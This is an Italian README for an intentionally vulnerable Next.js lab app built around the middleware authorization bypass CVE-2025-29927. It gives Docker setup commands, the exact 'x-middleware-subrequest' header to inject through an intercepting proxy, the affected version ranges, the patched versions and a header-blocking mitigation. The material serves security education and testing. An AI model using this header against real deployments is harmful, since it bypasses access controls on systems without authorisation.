
Un'app Next.js deliberatamente vulnerabile, soggetta a CVE-2025-29927, Authorization Bypass
Questo progetto è un'applicazione Next.js che è stata intenzionalmente configurata per essere vulnerabile a un Bypass dell'autorizzazione nel Middleware di Next.js (CVE-2025-29927). È fornita esclusivamente per scopi legali, educativi e di ricerca.
Accedendo, utilizzando o distribuendo questo codice, riconosci e accetti che:
Installa Docker e poi esegui:
docker build -t next-cve-2025-29927 .
docker run -p 3000:3000 next-cve-2025-29927
Apri http://localhost:3000 con il tuo browser per vedere il risultato.
Cattura la richiesta utilizzando un proxy di intercettazione come ZAP o Burp, e inietta il seguente header nella richiesta:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
>= 13.0.0, < 13.5.9
>= 14.0.0, < 14.2.25
>= 15.0.0, < 15.2.3
>= 11.1.4, < 12.3.5
Applica la patch alle ultime versioni
13.5.9
14.2.25
15.2.3
12.3.5
oppure, se non puoi aggiornare, blocca le richieste che contengono l'header x-middleware-subrequest.
Per saperne di più sulla vulnerabilità, dai un'occhiata alle seguenti risorse: